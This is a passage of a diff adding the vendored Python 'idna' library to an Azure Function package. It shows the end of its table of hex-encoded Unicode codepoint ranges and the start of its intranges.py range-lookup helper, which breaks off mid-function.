0x10f00000110, + 0x11100000112, + 0x11300000114, + 0x11500000116, + 0x11700000118, + 0x1190000011a, + 
0x11b0000011c, + 0x11d0000011e, + 0x11f00000120, + 0x12100000122, + 0x12300000124, + 0x12500000126, + 0x12700000128, + 0x1290000012a, + 0x12b0000012c, + 0x12d0000012e, + 0x12f00000130, + 0x13100000132, + 0x13500000136, + 0x13700000139, + 0x13a0000013b, + 0x13c0000013d, + 0x13e0000013f, + 0x14200000143, + 0x14400000145, + 0x14600000147, + 0x14800000149, + 0x14b0000014c, + 0x14d0000014e, + 0x14f00000150, + 0x15100000152, + 0x15300000154, + 0x15500000156, + 0x15700000158, + 0x1590000015a, + 0x15b0000015c, + 0x15d0000015e, + 0x15f00000160, + 0x16100000162, + 0x16300000164, + 0x16500000166, + 0x16700000168, + 0x1690000016a, + 0x16b0000016c, + 0x16d0000016e, + 0x16f00000170, + 0x17100000172, + 0x17300000174, + 0x17500000176, + 0x17700000178, + 0x17a0000017b, + 0x17c0000017d, + 0x17e0000017f, + 0x18000000181, + 0x18300000184, + 0x18500000186, + 0x18800000189, + 0x18c0000018e, + 0x19200000193, + 0x19500000196, + 0x1990000019c, + 0x19e0000019f, + 0x1a1000001a2, + 0x1a3000001a4, + 0x1a5000001a6, + 0x1a8000001a9, + 0x1aa000001ac, + 0x1ad000001ae, + 0x1b0000001b1, + 0x1b4000001b5, + 0x1b6000001b7, + 0x1b9000001bc, + 0x1bd000001c4, + 0x1ce000001cf, + 0x1d0000001d1, + 0x1d2000001d3, + 0x1d4000001d5, + 0x1d6000001d7, + 0x1d8000001d9, + 0x1da000001db, + 0x1dc000001de, + 0x1df000001e0, + 0x1e1000001e2, + 0x1e3000001e4, + 0x1e5000001e6, + 0x1e7000001e8, + 0x1e9000001ea, + 0x1eb000001ec, + 0x1ed000001ee, + 0x1ef000001f1, + 0x1f5000001f6, + 0x1f9000001fa, + 0x1fb000001fc, + 0x1fd000001fe, + 0x1ff00000200, + 0x20100000202, + 0x20300000204, + 0x20500000206, + 0x20700000208, + 0x2090000020a, + 0x20b0000020c, + 0x20d0000020e, + 0x20f00000210, + 0x21100000212, + 0x21300000214, + 0x21500000216, + 0x21700000218, + 0x2190000021a, + 0x21b0000021c, + 0x21d0000021e, + 0x21f00000220, + 0x22100000222, + 0x22300000224, + 0x22500000226, + 0x22700000228, + 0x2290000022a, + 0x22b0000022c, + 0x22d0000022e, + 0x22f00000230, + 0x23100000232, + 0x2330000023a, + 0x23c0000023d, + 0x23f00000241, + 0x24200000243, + 0x24700000248, + 0x2490000024a, + 0x24b0000024c, + 0x24d0000024e, + 0x24f000002b0, + 0x2b9000002c2, + 0x2c6000002d2, + 0x2ec000002ed, + 0x2ee000002ef, + 0x30000000340, + 0x34200000343, + 0x3460000034f, + 0x35000000370, + 0x37100000372, + 0x37300000374, + 0x37700000378, + 0x37b0000037e, + 0x39000000391, + 0x3ac000003cf, + 0x3d7000003d8, + 0x3d9000003da, + 0x3db000003dc, + 0x3dd000003de, + 0x3df000003e0, + 0x3e1000003e2, + 0x3e3000003e4, + 0x3e5000003e6, + 0x3e7000003e8, + 0x3e9000003ea, + 0x3eb000003ec, + 0x3ed000003ee, + 0x3ef000003f0, + 0x3f3000003f4, + 0x3f8000003f9, + 0x3fb000003fd, + 0x43000000460, + 0x46100000462, + 0x46300000464, + 0x46500000466, + 0x46700000468, + 0x4690000046a, + 0x46b0000046c, + 0x46d0000046e, + 0x46f00000470, + 0x47100000472, + 0x47300000474, + 0x47500000476, + 0x47700000478, + 0x4790000047a, + 0x47b0000047c, + 0x47d0000047e, + 0x47f00000480, + 0x48100000482, + 0x48300000488, + 0x48b0000048c, + 0x48d0000048e, + 0x48f00000490, + 0x49100000492, + 0x49300000494, + 0x49500000496, + 0x49700000498, + 0x4990000049a, + 0x49b0000049c, + 0x49d0000049e, + 0x49f000004a0, + 0x4a1000004a2, + 0x4a3000004a4, + 0x4a5000004a6, + 0x4a7000004a8, + 0x4a9000004aa, + 0x4ab000004ac, + 0x4ad000004ae, + 0x4af000004b0, + 0x4b1000004b2, + 0x4b3000004b4, + 0x4b5000004b6, + 0x4b7000004b8, + 0x4b9000004ba, + 0x4bb000004bc, + 0x4bd000004be, + 0x4bf000004c0, + 0x4c2000004c3, + 0x4c4000004c5, + 0x4c6000004c7, + 0x4c8000004c9, + 0x4ca000004cb, + 0x4cc000004cd, + 0x4ce000004d0, + 0x4d1000004d2, + 0x4d3000004d4, + 0x4d5000004d6, + 
0x4d7000004d8, + 0x4d9000004da, + 0x4db000004dc, + 0x4dd000004de, + 0x4df000004e0, + 0x4e1000004e2, + 0x4e3000004e4, + 0x4e5000004e6, + 0x4e7000004e8, + 0x4e9000004ea, + 0x4eb000004ec, + 0x4ed000004ee, + 0x4ef000004f0, + 0x4f1000004f2, + 0x4f3000004f4, + 0x4f5000004f6, + 0x4f7000004f8, + 0x4f9000004fa, + 0x4fb000004fc, + 0x4fd000004fe, + 0x4ff00000500, + 0x50100000502, + 0x50300000504, + 0x50500000506, + 0x50700000508, + 0x5090000050a, + 0x50b0000050c, + 0x50d0000050e, + 0x50f00000510, + 0x51100000512, + 0x51300000514, + 0x51500000516, + 0x51700000518, + 0x5190000051a, + 0x51b0000051c, + 0x51d0000051e, + 0x51f00000520, + 0x52100000522, + 0x52300000524, + 0x52500000526, + 0x52700000528, + 0x5290000052a, + 0x52b0000052c, + 0x52d0000052e, + 0x52f00000530, + 0x5590000055a, + 0x56000000587, + 0x58800000589, + 0x591000005be, + 0x5bf000005c0, + 0x5c1000005c3, + 0x5c4000005c6, + 0x5c7000005c8, + 0x5d0000005eb, + 0x5ef000005f3, + 0x6100000061b, + 0x62000000640, + 0x64100000660, + 0x66e00000675, + 0x679000006d4, + 0x6d5000006dd, + 0x6df000006e9, + 0x6ea000006f0, + 0x6fa00000700, + 0x7100000074b, + 0x74d000007b2, + 0x7c0000007f6, + 0x7fd000007fe, + 0x8000000082e, + 0x8400000085c, + 0x8600000086b, + 0x87000000888, + 0x8890000088f, + 0x898000008e2, + 0x8e300000958, + 0x96000000964, + 0x96600000970, + 0x97100000984, + 0x9850000098d, + 0x98f00000991, + 0x993000009a9, + 0x9aa000009b1, + 0x9b2000009b3, + 0x9b6000009ba, + 0x9bc000009c5, + 0x9c7000009c9, + 0x9cb000009cf, + 0x9d7000009d8, + 0x9e0000009e4, + 0x9e6000009f2, + 0x9fc000009fd, + 0x9fe000009ff, + 0xa0100000a04, + 0xa0500000a0b, + 0xa0f00000a11, + 0xa1300000a29, + 0xa2a00000a31, + 0xa3200000a33, + 0xa3500000a36, + 0xa3800000a3a, + 0xa3c00000a3d, + 0xa3e00000a43, + 0xa4700000a49, + 0xa4b00000a4e, + 0xa5100000a52, + 0xa5c00000a5d, + 0xa6600000a76, + 0xa8100000a84, + 0xa8500000a8e, + 0xa8f00000a92, + 0xa9300000aa9, + 0xaaa00000ab1, + 0xab200000ab4, + 0xab500000aba, + 0xabc00000ac6, + 0xac700000aca, + 0xacb00000ace, + 0xad000000ad1, + 0xae000000ae4, + 0xae600000af0, + 0xaf900000b00, + 0xb0100000b04, + 0xb0500000b0d, + 0xb0f00000b11, + 0xb1300000b29, + 0xb2a00000b31, + 0xb3200000b34, + 0xb3500000b3a, + 0xb3c00000b45, + 0xb4700000b49, + 0xb4b00000b4e, + 0xb5500000b58, + 0xb5f00000b64, + 0xb6600000b70, + 0xb7100000b72, + 0xb8200000b84, + 0xb8500000b8b, + 0xb8e00000b91, + 0xb9200000b96, + 0xb9900000b9b, + 0xb9c00000b9d, + 0xb9e00000ba0, + 0xba300000ba5, + 0xba800000bab, + 0xbae00000bba, + 0xbbe00000bc3, + 0xbc600000bc9, + 0xbca00000bce, + 0xbd000000bd1, + 0xbd700000bd8, + 0xbe600000bf0, + 0xc0000000c0d, + 0xc0e00000c11, + 0xc1200000c29, + 0xc2a00000c3a, + 0xc3c00000c45, + 0xc4600000c49, + 0xc4a00000c4e, + 0xc5500000c57, + 0xc5800000c5b, + 0xc5d00000c5e, + 0xc6000000c64, + 0xc6600000c70, + 0xc8000000c84, + 0xc8500000c8d, + 0xc8e00000c91, + 0xc9200000ca9, + 0xcaa00000cb4, + 0xcb500000cba, + 0xcbc00000cc5, + 0xcc600000cc9, + 0xcca00000cce, + 0xcd500000cd7, + 0xcdd00000cdf, + 0xce000000ce4, + 0xce600000cf0, + 0xcf100000cf3, + 0xd0000000d0d, + 0xd0e00000d11, + 0xd1200000d45, + 0xd4600000d49, + 0xd4a00000d4f, + 0xd5400000d58, + 0xd5f00000d64, + 0xd6600000d70, + 0xd7a00000d80, + 0xd8100000d84, + 0xd8500000d97, + 0xd9a00000db2, + 0xdb300000dbc, + 0xdbd00000dbe, + 0xdc000000dc7, + 0xdca00000dcb, + 0xdcf00000dd5, + 0xdd600000dd7, + 0xdd800000de0, + 0xde600000df0, + 0xdf200000df4, + 0xe0100000e33, + 0xe3400000e3b, + 0xe4000000e4f, + 0xe5000000e5a, + 0xe8100000e83, + 0xe8400000e85, + 0xe8600000e8b, + 0xe8c00000ea4, + 0xea500000ea6, + 0xea700000eb3, + 0xeb400000ebe, + 
0xec000000ec5, + 0xec600000ec7, + 0xec800000ece, + 0xed000000eda, + 0xede00000ee0, + 0xf0000000f01, + 0xf0b00000f0c, + 0xf1800000f1a, + 0xf2000000f2a, + 0xf3500000f36, + 0xf3700000f38, + 0xf3900000f3a, + 0xf3e00000f43, + 0xf4400000f48, + 0xf4900000f4d, + 0xf4e00000f52, + 0xf5300000f57, + 0xf5800000f5c, + 0xf5d00000f69, + 0xf6a00000f6d, + 0xf7100000f73, + 0xf7400000f75, + 0xf7a00000f81, + 0xf8200000f85, + 0xf8600000f93, + 0xf9400000f98, + 0xf9900000f9d, + 0xf9e00000fa2, + 0xfa300000fa7, + 0xfa800000fac, + 0xfad00000fb9, + 0xfba00000fbd, + 0xfc600000fc7, + 0x10000000104a, + 0x10500000109e, + 0x10d0000010fb, + 0x10fd00001100, + 0x120000001249, + 0x124a0000124e, + 0x125000001257, + 0x125800001259, + 0x125a0000125e, + 0x126000001289, + 0x128a0000128e, + 0x1290000012b1, + 0x12b2000012b6, + 0x12b8000012bf, + 0x12c0000012c1, + 0x12c2000012c6, + 0x12c8000012d7, + 0x12d800001311, + 0x131200001316, + 0x13180000135b, + 0x135d00001360, + 0x138000001390, + 0x13a0000013f6, + 0x14010000166d, + 0x166f00001680, + 0x16810000169b, + 0x16a0000016eb, + 0x16f1000016f9, + 0x170000001716, + 0x171f00001735, + 0x174000001754, + 0x17600000176d, + 0x176e00001771, + 0x177200001774, + 0x1780000017b4, + 0x17b6000017d4, + 0x17d7000017d8, + 0x17dc000017de, + 0x17e0000017ea, + 0x18100000181a, + 0x182000001879, + 0x1880000018ab, + 0x18b0000018f6, + 0x19000000191f, + 0x19200000192c, + 0x19300000193c, + 0x19460000196e, + 0x197000001975, + 0x1980000019ac, + 0x19b0000019ca, + 0x19d0000019da, + 0x1a0000001a1c, + 0x1a2000001a5f, + 0x1a6000001a7d, + 0x1a7f00001a8a, + 0x1a9000001a9a, + 0x1aa700001aa8, + 0x1ab000001abe, + 0x1abf00001acf, + 0x1b0000001b4d, + 0x1b5000001b5a, + 0x1b6b00001b74, + 0x1b8000001bf4, + 0x1c0000001c38, + 0x1c4000001c4a, + 0x1c4d00001c7e, + 0x1cd000001cd3, + 0x1cd400001cfb, + 0x1d0000001d2c, + 0x1d2f00001d30, + 0x1d3b00001d3c, + 0x1d4e00001d4f, + 0x1d6b00001d78, + 0x1d7900001d9b, + 0x1dc000001e00, + 0x1e0100001e02, + 0x1e0300001e04, + 0x1e0500001e06, + 0x1e0700001e08, + 0x1e0900001e0a, + 0x1e0b00001e0c, + 0x1e0d00001e0e, + 0x1e0f00001e10, + 0x1e1100001e12, + 0x1e1300001e14, + 0x1e1500001e16, + 0x1e1700001e18, + 0x1e1900001e1a, + 0x1e1b00001e1c, + 0x1e1d00001e1e, + 0x1e1f00001e20, + 0x1e2100001e22, + 0x1e2300001e24, + 0x1e2500001e26, + 0x1e2700001e28, + 0x1e2900001e2a, + 0x1e2b00001e2c, + 0x1e2d00001e2e, + 0x1e2f00001e30, + 0x1e3100001e32, + 0x1e3300001e34, + 0x1e3500001e36, + 0x1e3700001e38, + 0x1e3900001e3a, + 0x1e3b00001e3c, + 0x1e3d00001e3e, + 0x1e3f00001e40, + 0x1e4100001e42, + 0x1e4300001e44, + 0x1e4500001e46, + 0x1e4700001e48, + 0x1e4900001e4a, + 0x1e4b00001e4c, + 0x1e4d00001e4e, + 0x1e4f00001e50, + 0x1e5100001e52, + 0x1e5300001e54, + 0x1e5500001e56, + 0x1e5700001e58, + 0x1e5900001e5a, + 0x1e5b00001e5c, + 0x1e5d00001e5e, + 0x1e5f00001e60, + 0x1e6100001e62, + 0x1e6300001e64, + 0x1e6500001e66, + 0x1e6700001e68, + 0x1e6900001e6a, + 0x1e6b00001e6c, + 0x1e6d00001e6e, + 0x1e6f00001e70, + 0x1e7100001e72, + 0x1e7300001e74, + 0x1e7500001e76, + 0x1e7700001e78, + 0x1e7900001e7a, + 0x1e7b00001e7c, + 0x1e7d00001e7e, + 0x1e7f00001e80, + 0x1e8100001e82, + 0x1e8300001e84, + 0x1e8500001e86, + 0x1e8700001e88, + 0x1e8900001e8a, + 0x1e8b00001e8c, + 0x1e8d00001e8e, + 0x1e8f00001e90, + 0x1e9100001e92, + 0x1e9300001e94, + 0x1e9500001e9a, + 0x1e9c00001e9e, + 0x1e9f00001ea0, + 0x1ea100001ea2, + 0x1ea300001ea4, + 0x1ea500001ea6, + 0x1ea700001ea8, + 0x1ea900001eaa, + 0x1eab00001eac, + 0x1ead00001eae, + 0x1eaf00001eb0, + 0x1eb100001eb2, + 0x1eb300001eb4, + 0x1eb500001eb6, + 0x1eb700001eb8, + 0x1eb900001eba, + 0x1ebb00001ebc, + 
0x1ebd00001ebe, + 0x1ebf00001ec0, + 0x1ec100001ec2, + 0x1ec300001ec4, + 0x1ec500001ec6, + 0x1ec700001ec8, + 0x1ec900001eca, + 0x1ecb00001ecc, + 0x1ecd00001ece, + 0x1ecf00001ed0, + 0x1ed100001ed2, + 0x1ed300001ed4, + 0x1ed500001ed6, + 0x1ed700001ed8, + 0x1ed900001eda, + 0x1edb00001edc, + 0x1edd00001ede, + 0x1edf00001ee0, + 0x1ee100001ee2, + 0x1ee300001ee4, + 0x1ee500001ee6, + 0x1ee700001ee8, + 0x1ee900001eea, + 0x1eeb00001eec, + 0x1eed00001eee, + 0x1eef00001ef0, + 0x1ef100001ef2, + 0x1ef300001ef4, + 0x1ef500001ef6, + 0x1ef700001ef8, + 0x1ef900001efa, + 0x1efb00001efc, + 0x1efd00001efe, + 0x1eff00001f08, + 0x1f1000001f16, + 0x1f2000001f28, + 0x1f3000001f38, + 0x1f4000001f46, + 0x1f5000001f58, + 0x1f6000001f68, + 0x1f7000001f71, + 0x1f7200001f73, + 0x1f7400001f75, + 0x1f7600001f77, + 0x1f7800001f79, + 0x1f7a00001f7b, + 0x1f7c00001f7d, + 0x1fb000001fb2, + 0x1fb600001fb7, + 0x1fc600001fc7, + 0x1fd000001fd3, + 0x1fd600001fd8, + 0x1fe000001fe3, + 0x1fe400001fe8, + 0x1ff600001ff7, + 0x214e0000214f, + 0x218400002185, + 0x2c3000002c60, + 0x2c6100002c62, + 0x2c6500002c67, + 0x2c6800002c69, + 0x2c6a00002c6b, + 0x2c6c00002c6d, + 0x2c7100002c72, + 0x2c7300002c75, + 0x2c7600002c7c, + 0x2c8100002c82, + 0x2c8300002c84, + 0x2c8500002c86, + 0x2c8700002c88, + 0x2c8900002c8a, + 0x2c8b00002c8c, + 0x2c8d00002c8e, + 0x2c8f00002c90, + 0x2c9100002c92, + 0x2c9300002c94, + 0x2c9500002c96, + 0x2c9700002c98, + 0x2c9900002c9a, + 0x2c9b00002c9c, + 0x2c9d00002c9e, + 0x2c9f00002ca0, + 0x2ca100002ca2, + 0x2ca300002ca4, + 0x2ca500002ca6, + 0x2ca700002ca8, + 0x2ca900002caa, + 0x2cab00002cac, + 0x2cad00002cae, + 0x2caf00002cb0, + 0x2cb100002cb2, + 0x2cb300002cb4, + 0x2cb500002cb6, + 0x2cb700002cb8, + 0x2cb900002cba, + 0x2cbb00002cbc, + 0x2cbd00002cbe, + 0x2cbf00002cc0, + 0x2cc100002cc2, + 0x2cc300002cc4, + 0x2cc500002cc6, + 0x2cc700002cc8, + 0x2cc900002cca, + 0x2ccb00002ccc, + 0x2ccd00002cce, + 0x2ccf00002cd0, + 0x2cd100002cd2, + 0x2cd300002cd4, + 0x2cd500002cd6, + 0x2cd700002cd8, + 0x2cd900002cda, + 0x2cdb00002cdc, + 0x2cdd00002cde, + 0x2cdf00002ce0, + 0x2ce100002ce2, + 0x2ce300002ce5, + 0x2cec00002ced, + 0x2cee00002cf2, + 0x2cf300002cf4, + 0x2d0000002d26, + 0x2d2700002d28, + 0x2d2d00002d2e, + 0x2d3000002d68, + 0x2d7f00002d97, + 0x2da000002da7, + 0x2da800002daf, + 0x2db000002db7, + 0x2db800002dbf, + 0x2dc000002dc7, + 0x2dc800002dcf, + 0x2dd000002dd7, + 0x2dd800002ddf, + 0x2de000002e00, + 0x2e2f00002e30, + 0x300500003008, + 0x302a0000302e, + 0x303c0000303d, + 0x304100003097, + 0x30990000309b, + 0x309d0000309f, + 0x30a1000030fb, + 0x30fc000030ff, + 0x310500003130, + 0x31a0000031c0, + 0x31f000003200, + 0x340000004dc0, + 0x4e000000a48d, + 0xa4d00000a4fe, + 0xa5000000a60d, + 0xa6100000a62c, + 0xa6410000a642, + 0xa6430000a644, + 0xa6450000a646, + 0xa6470000a648, + 0xa6490000a64a, + 0xa64b0000a64c, + 0xa64d0000a64e, + 0xa64f0000a650, + 0xa6510000a652, + 0xa6530000a654, + 0xa6550000a656, + 0xa6570000a658, + 0xa6590000a65a, + 0xa65b0000a65c, + 0xa65d0000a65e, + 0xa65f0000a660, + 0xa6610000a662, + 0xa6630000a664, + 0xa6650000a666, + 0xa6670000a668, + 0xa6690000a66a, + 0xa66b0000a66c, + 0xa66d0000a670, + 0xa6740000a67e, + 0xa67f0000a680, + 0xa6810000a682, + 0xa6830000a684, + 0xa6850000a686, + 0xa6870000a688, + 0xa6890000a68a, + 0xa68b0000a68c, + 0xa68d0000a68e, + 0xa68f0000a690, + 0xa6910000a692, + 0xa6930000a694, + 0xa6950000a696, + 0xa6970000a698, + 0xa6990000a69a, + 0xa69b0000a69c, + 0xa69e0000a6e6, + 0xa6f00000a6f2, + 0xa7170000a720, + 0xa7230000a724, + 0xa7250000a726, + 0xa7270000a728, + 0xa7290000a72a, + 0xa72b0000a72c, + 
0xa72d0000a72e, + 0xa72f0000a732, + 0xa7330000a734, + 0xa7350000a736, + 0xa7370000a738, + 0xa7390000a73a, + 0xa73b0000a73c, + 0xa73d0000a73e, + 0xa73f0000a740, + 0xa7410000a742, + 0xa7430000a744, + 0xa7450000a746, + 0xa7470000a748, + 0xa7490000a74a, + 0xa74b0000a74c, + 0xa74d0000a74e, + 0xa74f0000a750, + 0xa7510000a752, + 0xa7530000a754, + 0xa7550000a756, + 0xa7570000a758, + 0xa7590000a75a, + 0xa75b0000a75c, + 0xa75d0000a75e, + 0xa75f0000a760, + 0xa7610000a762, + 0xa7630000a764, + 0xa7650000a766, + 0xa7670000a768, + 0xa7690000a76a, + 0xa76b0000a76c, + 0xa76d0000a76e, + 0xa76f0000a770, + 0xa7710000a779, + 0xa77a0000a77b, + 0xa77c0000a77d, + 0xa77f0000a780, + 0xa7810000a782, + 0xa7830000a784, + 0xa7850000a786, + 0xa7870000a789, + 0xa78c0000a78d, + 0xa78e0000a790, + 0xa7910000a792, + 0xa7930000a796, + 0xa7970000a798, + 0xa7990000a79a, + 0xa79b0000a79c, + 0xa79d0000a79e, + 0xa79f0000a7a0, + 0xa7a10000a7a2, + 0xa7a30000a7a4, + 0xa7a50000a7a6, + 0xa7a70000a7a8, + 0xa7a90000a7aa, + 0xa7af0000a7b0, + 0xa7b50000a7b6, + 0xa7b70000a7b8, + 0xa7b90000a7ba, + 0xa7bb0000a7bc, + 0xa7bd0000a7be, + 0xa7bf0000a7c0, + 0xa7c10000a7c2, + 0xa7c30000a7c4, + 0xa7c80000a7c9, + 0xa7ca0000a7cb, + 0xa7d10000a7d2, + 0xa7d30000a7d4, + 0xa7d50000a7d6, + 0xa7d70000a7d8, + 0xa7d90000a7da, + 0xa7f20000a7f5, + 0xa7f60000a7f8, + 0xa7fa0000a828, + 0xa82c0000a82d, + 0xa8400000a874, + 0xa8800000a8c6, + 0xa8d00000a8da, + 0xa8e00000a8f8, + 0xa8fb0000a8fc, + 0xa8fd0000a92e, + 0xa9300000a954, + 0xa9800000a9c1, + 0xa9cf0000a9da, + 0xa9e00000a9ff, + 0xaa000000aa37, + 0xaa400000aa4e, + 0xaa500000aa5a, + 0xaa600000aa77, + 0xaa7a0000aac3, + 0xaadb0000aade, + 0xaae00000aaf0, + 0xaaf20000aaf7, + 0xab010000ab07, + 0xab090000ab0f, + 0xab110000ab17, + 0xab200000ab27, + 0xab280000ab2f, + 0xab300000ab5b, + 0xab600000ab6a, + 0xabc00000abeb, + 0xabec0000abee, + 0xabf00000abfa, + 0xac000000d7a4, + 0xfa0e0000fa10, + 0xfa110000fa12, + 0xfa130000fa15, + 0xfa1f0000fa20, + 0xfa210000fa22, + 0xfa230000fa25, + 0xfa270000fa2a, + 0xfb1e0000fb1f, + 0xfe200000fe30, + 0xfe730000fe74, + 0x100000001000c, + 0x1000d00010027, + 0x100280001003b, + 0x1003c0001003e, + 0x1003f0001004e, + 0x100500001005e, + 0x10080000100fb, + 0x101fd000101fe, + 0x102800001029d, + 0x102a0000102d1, + 0x102e0000102e1, + 0x1030000010320, + 0x1032d00010341, + 0x103420001034a, + 0x103500001037b, + 0x103800001039e, + 0x103a0000103c4, + 0x103c8000103d0, + 0x104280001049e, + 0x104a0000104aa, + 0x104d8000104fc, + 0x1050000010528, + 0x1053000010564, + 0x10597000105a2, + 0x105a3000105b2, + 0x105b3000105ba, + 0x105bb000105bd, + 0x1060000010737, + 0x1074000010756, + 0x1076000010768, + 0x1078000010786, + 0x10787000107b1, + 0x107b2000107bb, + 0x1080000010806, + 0x1080800010809, + 0x1080a00010836, + 0x1083700010839, + 0x1083c0001083d, + 0x1083f00010856, + 0x1086000010877, + 0x108800001089f, + 0x108e0000108f3, + 0x108f4000108f6, + 0x1090000010916, + 0x109200001093a, + 0x10980000109b8, + 0x109be000109c0, + 0x10a0000010a04, + 0x10a0500010a07, + 0x10a0c00010a14, + 0x10a1500010a18, + 0x10a1900010a36, + 0x10a3800010a3b, + 0x10a3f00010a40, + 0x10a6000010a7d, + 0x10a8000010a9d, + 0x10ac000010ac8, + 0x10ac900010ae7, + 0x10b0000010b36, + 0x10b4000010b56, + 0x10b6000010b73, + 0x10b8000010b92, + 0x10c0000010c49, + 0x10cc000010cf3, + 0x10d0000010d28, + 0x10d3000010d3a, + 0x10e8000010eaa, + 0x10eab00010ead, + 0x10eb000010eb2, + 0x10f0000010f1d, + 0x10f2700010f28, + 0x10f3000010f51, + 0x10f7000010f86, + 0x10fb000010fc5, + 0x10fe000010ff7, + 0x1100000011047, + 0x1106600011076, + 0x1107f000110bb, + 0x110c2000110c3, + 
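+ # [Editor's note; annotation, not part of the upstream idna sources] Each
+ # value in the tuples above packs one half-open codepoint range into a
+ # single integer as (start << 32) | end; the helpers in intranges.py, added
+ # later in this diff, encode, decode, and binary-search these values. A
+ # minimal sketch of both directions, assuming the package is importable as
+ # idna.intranges:
+ #   r = 0x2b9000002c2
+ #   start, end = (r >> 32), (r & ((1 << 32) - 1))    # 0x2B9, 0x2C2
+ #   # i.e. this entry covers U+02B9 through U+02C1 inclusive
+ #   from idna.intranges import intranges_contain, intranges_from_list
+ #   intranges_contain(0x2BA, (r,))                   # True
+ #   intranges_from_list([1, 2, 3, 7, 8])             # ((1 << 32) | 4, (7 << 32) | 9)
+ # The 'CONTEXTJ' and 'CONTEXTO' keys that close this table list codepoints
+ # permitted only subject to the contextual rules of RFC 5892, Appendix A
+ # (e.g. ZERO WIDTH JOINER, MIDDLE DOT).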
0x110d0000110e9, + 0x110f0000110fa, + 0x1110000011135, + 0x1113600011140, + 0x1114400011148, + 0x1115000011174, + 0x1117600011177, + 0x11180000111c5, + 0x111c9000111cd, + 0x111ce000111db, + 0x111dc000111dd, + 0x1120000011212, + 0x1121300011238, + 0x1123e0001123f, + 0x1128000011287, + 0x1128800011289, + 0x1128a0001128e, + 0x1128f0001129e, + 0x1129f000112a9, + 0x112b0000112eb, + 0x112f0000112fa, + 0x1130000011304, + 0x113050001130d, + 0x1130f00011311, + 0x1131300011329, + 0x1132a00011331, + 0x1133200011334, + 0x113350001133a, + 0x1133b00011345, + 0x1134700011349, + 0x1134b0001134e, + 0x1135000011351, + 0x1135700011358, + 0x1135d00011364, + 0x113660001136d, + 0x1137000011375, + 0x114000001144b, + 0x114500001145a, + 0x1145e00011462, + 0x11480000114c6, + 0x114c7000114c8, + 0x114d0000114da, + 0x11580000115b6, + 0x115b8000115c1, + 0x115d8000115de, + 0x1160000011641, + 0x1164400011645, + 0x116500001165a, + 0x11680000116b9, + 0x116c0000116ca, + 0x117000001171b, + 0x1171d0001172c, + 0x117300001173a, + 0x1174000011747, + 0x118000001183b, + 0x118c0000118ea, + 0x118ff00011907, + 0x119090001190a, + 0x1190c00011914, + 0x1191500011917, + 0x1191800011936, + 0x1193700011939, + 0x1193b00011944, + 0x119500001195a, + 0x119a0000119a8, + 0x119aa000119d8, + 0x119da000119e2, + 0x119e3000119e5, + 0x11a0000011a3f, + 0x11a4700011a48, + 0x11a5000011a9a, + 0x11a9d00011a9e, + 0x11ab000011af9, + 0x11c0000011c09, + 0x11c0a00011c37, + 0x11c3800011c41, + 0x11c5000011c5a, + 0x11c7200011c90, + 0x11c9200011ca8, + 0x11ca900011cb7, + 0x11d0000011d07, + 0x11d0800011d0a, + 0x11d0b00011d37, + 0x11d3a00011d3b, + 0x11d3c00011d3e, + 0x11d3f00011d48, + 0x11d5000011d5a, + 0x11d6000011d66, + 0x11d6700011d69, + 0x11d6a00011d8f, + 0x11d9000011d92, + 0x11d9300011d99, + 0x11da000011daa, + 0x11ee000011ef7, + 0x11fb000011fb1, + 0x120000001239a, + 0x1248000012544, + 0x12f9000012ff1, + 0x130000001342f, + 0x1440000014647, + 0x1680000016a39, + 0x16a4000016a5f, + 0x16a6000016a6a, + 0x16a7000016abf, + 0x16ac000016aca, + 0x16ad000016aee, + 0x16af000016af5, + 0x16b0000016b37, + 0x16b4000016b44, + 0x16b5000016b5a, + 0x16b6300016b78, + 0x16b7d00016b90, + 0x16e6000016e80, + 0x16f0000016f4b, + 0x16f4f00016f88, + 0x16f8f00016fa0, + 0x16fe000016fe2, + 0x16fe300016fe5, + 0x16ff000016ff2, + 0x17000000187f8, + 0x1880000018cd6, + 0x18d0000018d09, + 0x1aff00001aff4, + 0x1aff50001affc, + 0x1affd0001afff, + 0x1b0000001b123, + 0x1b1500001b153, + 0x1b1640001b168, + 0x1b1700001b2fc, + 0x1bc000001bc6b, + 0x1bc700001bc7d, + 0x1bc800001bc89, + 0x1bc900001bc9a, + 0x1bc9d0001bc9f, + 0x1cf000001cf2e, + 0x1cf300001cf47, + 0x1da000001da37, + 0x1da3b0001da6d, + 0x1da750001da76, + 0x1da840001da85, + 0x1da9b0001daa0, + 0x1daa10001dab0, + 0x1df000001df1f, + 0x1e0000001e007, + 0x1e0080001e019, + 0x1e01b0001e022, + 0x1e0230001e025, + 0x1e0260001e02b, + 0x1e1000001e12d, + 0x1e1300001e13e, + 0x1e1400001e14a, + 0x1e14e0001e14f, + 0x1e2900001e2af, + 0x1e2c00001e2fa, + 0x1e7e00001e7e7, + 0x1e7e80001e7ec, + 0x1e7ed0001e7ef, + 0x1e7f00001e7ff, + 0x1e8000001e8c5, + 0x1e8d00001e8d7, + 0x1e9220001e94c, + 0x1e9500001e95a, + 0x1fbf00001fbfa, + 0x200000002a6e0, + 0x2a7000002b739, + 0x2b7400002b81e, + 0x2b8200002cea2, + 0x2ceb00002ebe1, + 0x300000003134b, + ), + 'CONTEXTJ': ( + 0x200c0000200e, + ), + 'CONTEXTO': ( + 0xb7000000b8, + 0x37500000376, + 0x5f3000005f5, + 0x6600000066a, + 0x6f0000006fa, + 0x30fb000030fc, + ), +} diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/intranges.py 
b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/intranges.py new file mode 100644 index 0000000..822f342 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/intranges.py @@ -0,0 +1,54 @@ +""" +Given a list of integers, made up of (hopefully) a small number of long runs +of consecutive integers, compute a representation of the form +((start1, end1), (start2, end2) ...). Then answer the question "was x present +in the original list?" in time O(log(# runs)). +""" + +import bisect +from typing import List, Tuple + +def intranges_from_list(list_: List[int]) -> Tuple[int, ...]: + """Represent a list of integers as a sequence of ranges: + ((start_0, end_0), (start_1, end_1), ...), such that the original + integers are exactly those x such that start_i <= x < end_i for some i. + + Ranges are encoded as single integers (start << 32 | end), not as tuples. + """ + + sorted_list = sorted(list_) + ranges = [] + last_write = -1 + for i in range(len(sorted_list)): + if i+1 < len(sorted_list): + if sorted_list[i] == sorted_list[i+1]-1: + continue + current_range = sorted_list[last_write+1:i+1] + ranges.append(_encode_range(current_range[0], current_range[-1] + 1)) + last_write = i + + return tuple(ranges) + +def _encode_range(start: int, end: int) -> int: + return (start << 32) | end + +def _decode_range(r: int) -> Tuple[int, 